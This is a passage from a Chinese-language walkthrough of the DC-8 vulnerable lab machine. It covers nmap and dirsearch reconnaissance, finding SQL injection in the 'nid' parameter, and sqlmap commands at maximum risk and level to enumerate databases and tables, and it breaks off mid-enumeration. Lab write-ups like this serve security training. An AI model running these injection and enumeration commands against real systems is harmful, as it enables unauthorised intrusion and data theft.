文章预览
攻击机kali:192.168.111.146 靶机DC-8:192.168.111.143 信息收集 IP 端口 nmap -A -p- -T4 192.168.111.143 目录 dirsearch -u http://192.168.111.143 -i 200 得到登录页面,想办法得到用户名和密码,尝试了暴力破解,弱口令等等方式 CMS 漏洞探测 访问网站首页,http://192.168.111.143/?nid=1,通过nid进行传参 在传参nid=1加上‘,页面显示报错信息,存在SQL注入漏洞 也可以使用sqlmap探测漏洞 sqlmap -u "http://192.168.111.143/?nid=1" --batch 爆破数据库 sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 --dbs --risk=3 :风险等级,对目标系统安全性要求较低,对速度要求较高,谨慎使用,可能会对系统造成影响(0-3.等级越低,影响越小) --level=5:测试等级,5级包含的payload最多(1-5.测试等级越高,测试将越全面,) 爆破数据表 sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db --table
………………………………